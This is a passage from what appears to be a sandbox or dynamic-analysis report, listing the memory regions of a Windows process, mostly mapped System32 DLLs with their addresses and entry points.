"settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 674 start_va = 0x7ffc53100000 end_va = 0x7ffc531b0fff monitored = 0 entry_point = 0x7ffc531108f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 675 start_va = 0x7ffc531d0000 end_va = 0x7ffc531e4fff monitored = 0 entry_point = 0x7ffc531d1ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 676 start_va = 0x7ffc531f0000 end_va = 0x7ffc532bdfff monitored = 0 entry_point = 0x7ffc532214c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 677 start_va = 0x7ffc532c0000 end_va = 0x7ffc533b8fff monitored = 0 entry_point = 0x7ffc53308000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 678 start_va = 0x7ffc53440000 end_va = 0x7ffc5346afff monitored = 0 entry_point = 0x7ffc5344c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 679 start_va = 0x7ffc53470000 end_va = 0x7ffc5357cfff monitored = 0 entry_point = 0x7ffc5349f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 680 start_va = 0x7ffc53600000 end_va = 0x7ffc5365efff monitored = 0 entry_point = 0x7ffc5362bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 681 start_va = 0x7ffc538e0000 end_va = 0x7ffc538e9fff monitored = 0 entry_point = 0x7ffc538e14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 682 start_va = 0x7ffc53930000 end_va = 0x7ffc53b8cfff monitored = 0 entry_point = 0x7ffc539b8610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 683 start_va = 0x7ffc53b90000 end_va = 0x7ffc53b98fff monitored = 0 entry_point = 0x7ffc53b91480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 684 start_va = 0x7ffc53ef0000 end_va = 0x7ffc53f3afff monitored = 0 entry_point = 0x7ffc53f07b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 685 start_va = 0x7ffc54080000 end_va = 0x7ffc540fffff monitored = 0 entry_point = 0x7ffc540ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 686 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 687 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 688 start_va = 0x7ffc541f0000 end_va = 0x7ffc54477fff monitored = 0 entry_point = 0x7ffc5424f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 689 start_va = 0x7ffc545b0000 end_va = 0x7ffc545c3fff monitored = 0 entry_point = 0x7ffc545b50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 690 start_va = 0x7ffc548f0000 end_va = 0x7ffc5495cfff monitored = 0 entry_point = 0x7ffc548fd750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 691 start_va = 0x7ffc54af0000 end_va = 0x7ffc54b17fff monitored = 0 entry_point = 0x7ffc54af8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 692 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 693 start_va = 0x7ffc54d00000 end_va = 0x7ffc54d97fff monitored = 0 entry_point = 0x7ffc54d23980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 694 start_va = 0x7ffc54da0000 end_va = 0x7ffc54e3ffff monitored = 0 entry_point = 0x7ffc54dc56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 695 start_va = 0x7ffc54fb0000 end_va = 0x7ffc54febfff monitored = 0 entry_point = 0x7ffc54fb25e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 696 start_va = 0x7ffc54ff0000 end_va = 0x7ffc55077fff monitored = 0 entry_point = 0x7ffc55004510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 697 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 698 start_va = 0x7ffc551d0000 end_va = 0x7ffc55270fff monitored = 0 entry_point = 0x7ffc551d3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 699 start_va = 0x7ffc55280000 end_va = 0x7ffc5529ffff monitored = 0 entry_point = 0x7ffc55281920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 700 start_va = 0x7ffc552a0000 end_va = 0x7ffc5530ffff monitored = 0 entry_point = 0x7ffc552c2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 701 start_va = 0x7ffc55360000 end_va = 0x7ffc55378fff monitored = 0 entry_point = 0x7ffc55364520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 702 start_va = 0x7ffc553a0000 end_va = 0x7ffc55421fff monitored = 0 entry_point = 0x7ffc553a4ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 703 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 704 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 705 start_va = 0x7ffc55aa0000 end_va = 0x7ffc55c5cfff monitored = 0 entry_point = 0x7ffc55acaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 706 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 707 start_va = 0x7ffc57030000 end_va = 0x7ffc570d8fff monitored = 0 entry_point = 0x7ffc57059010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 708 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 709 start_va = 0x7ffc571f0000 end_va = 0x7ffc57259fff monitored = 0 entry_point = 0x7ffc571f9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 710 start_va = 0x7ffc57260000 end_va = 0x7ffc5726bfff monitored = 0 entry_point = 0x7ffc57261470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 711 start_va = 0x7ffc57270000 end_va = 0x7ffc572ccfff monitored = 0 entry_point = 0x7ffc57276c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 712 start_va = 0x7ffc572d0000 end_va = 0x7ffc57320fff monitored = 0 entry_point = 0x7ffc572d25e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 713 start_va = 0x7ffc57330000 end_va = 0x7ffc574effff monitored = 0 entry_point = 0x7ffc57339e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 714 start_va = 0x7ffc57590000 end_va = 0x7ffc57609fff monitored = 0 entry_point = 0x7ffc575b7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 715 start_va = 0x7ffc57650000 end_va = 0x7ffc57665fff monitored = 0 entry_point = 0x7ffc57651b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 716 start_va = 0x7ffc57670000 end_va = 0x7ffc576d3fff monitored = 0 entry_point = 0x7ffc57685ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 717 start_va = 0x7ffc578a0000 end_va = 0x7ffc5794dfff monitored = 0 entry_point = 0x7ffc578b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 718 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57af4fff monitored = 0 entry_point = 0x7ffc57aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 719 start_va = 0x7ffc57b60000 end_va = 0x7ffc57ba0fff monitored = 0 entry_point = 0x7ffc57b64840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 720 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 721 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 722 start_va = 0x7ffc57f40000 end_va = 0x7ffc57fa0fff monitored = 0 entry_point = 0x7ffc57f44b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 723 start_va = 0x7ffc58230000 end_va = 0x7ffc582c1fff monitored = 0 entry_point = 0x7ffc5827a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 724 start_va = 0x7ffc58390000 end_va = 0x7ffc588d4fff monitored = 0 entry_point = 0x7ffc5852a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 725 start_va = 0x7ffc588e0000 end_va = 0x7ffc58b4efff monitored = 0 entry_point = 0x7ffc589922b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 726 start_va = 0x7ffc58d40000 end_va = 0x7ffc58d50fff monitored = 0 entry_point = 0x7ffc58d43320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 727 start_va = 0x7ffc59140000 end_va = 0x7ffc5918afff monitored = 0 entry_point = 0x7ffc591572b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 728 start_va = 0x7ffc59190000 end_va = 0x7ffc59340fff monitored = 0 entry_point = 0x7ffc592261a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 729 start_va = 0x7ffc59350000 end_va = 0x7ffc59415fff monitored = 0 entry_point = 0x7ffc59353ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 730 start_va = 0x7ffc59420000 end_va = 0x7ffc5945ffff monitored = 0 entry_point = 0x7ffc59433750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 731 start_va = 0x7ffc594c0000 end_va = 0x7ffc594f2fff monitored = 0 entry_point = 0x7ffc594c3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 732 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 733 start_va = 0x7ffc599a0000 end_va = 0x7ffc59a06fff monitored = 0 entry_point = 0x7ffc599be710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 734 start_va = 0x7ffc59a10000 end_va = 0x7ffc59a5efff monitored = 0 entry_point = 0x7ffc59a17ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 735 start_va = 0x7ffc59a60000 end_va = 0x7ffc59b01fff monitored = 0 entry_point = 0x7ffc59a80a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 736 start_va = 0x7ffc59b10000 end_va = 0x7ffc59db7fff monitored = 0 entry_point = 0x7ffc59ba3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 737 start_va = 0x7ffc59dc0000 end_va = 0x7ffc59de1fff monitored = 0 entry_point = 0x7ffc59dc1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 738 start_va = 0x7ffc59e10000 end_va = 0x7ffc59ecdfff monitored = 0 entry_point = 0x7ffc59e52d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 739 start_va = 0x7ffc59ed0000 end_va = 0x7ffc59fb2fff monitored = 0 entry_point = 0x7ffc59f07da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 740 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 741 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 742 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 743 start_va = 0x7ffc5a530000 end_va = 0x7ffc5a54bfff monitored = 0 entry_point = 0x7ffc5a5337a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 744 start_va = 0x7ffc5a550000 end_va = 0x7ffc5a55bfff monitored = 0 entry_point = 0x7ffc5a551860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 745 start_va = 0x7ffc5a560000 end_va = 0x7ffc5a575fff monitored = 0 entry_point = 0x7ffc5a563380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 746 start_va = 0x7ffc5a580000 end_va = 0x7ffc5a58afff monitored = 0 entry_point = 0x7ffc5a581a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 747 start_va = 0x7ffc5a590000 end_va = 0x7ffc5a5b4fff monitored = 0 entry_point = 0x7ffc5a592300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 748 start_va = 0x7ffc5a5f0000 end_va = 0x7ffc5a614fff monitored = 0 entry_point = 0x7ffc5a605220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 749 start_va = 0x7ffc5a650000 end_va = 0x7ffc5a664fff monitored = 0 entry_point = 0x7ffc5a652850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 750 start_va = 0x7ffc5a6b0000 end_va = 0x7ffc5a6d2fff monitored = 0 entry_point = 0x7ffc5a6b99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 751 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 752 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 753 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 754 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 755 start_va = 0x7ffc5abf0000 end_va = 0x7ffc5ac19fff monitored = 0 entry_point = 0x7ffc5abf8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 756 start_va = 0x7ffc5afd0000 end_va = 0x7ffc5b0c3fff monitored = 0 entry_point = 0x7ffc5afda960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 757 start_va = 0x7ffc5b240000 end_va = 0x7ffc5b24bfff monitored = 0 entry_point = 0x7ffc5b2427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 758 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 759 start_va = 0x7ffc5b380000 end_va = 0x7ffc5b3f9fff monitored = 0 entry_point = 0x7ffc5b3a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 760 start_va = 0x7ffc5b480000 end_va = 0x7ffc5b489fff monitored = 0 entry_point = 0x7ffc5b481830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 761 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 762 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 763 start_va = 0x7ffc5b7b0000 end_va = 0x7ffc5b7c6fff monitored = 0 entry_point = 0x7ffc5b7b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 764 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 765 start_va = 0x7ffc5b960000 end_va = 0x7ffc5b999fff monitored = 0 entry_point = 0x7ffc5b968d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 766 start_va = 0x7ffc5b9a0000 end_va = 0x7ffc5b9c6fff monitored = 0 entry_point = 0x7ffc5b9b0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 767 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 768 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 769 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 770 start_va = 0x7ffc5bcf0000 end_va = 0x7ffc5bd88fff monitored = 0 entry_point = 0x7ffc5bd1f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 771 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 772 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 773 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 774 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 775 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 776 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 777 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 778 start_va = 0x7ffc5c360000 end_va = 0x7ffc5c3b4fff monitored = 0 entry_point = 0x7ffc5c377970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 779 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 780 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 781 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 782 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = 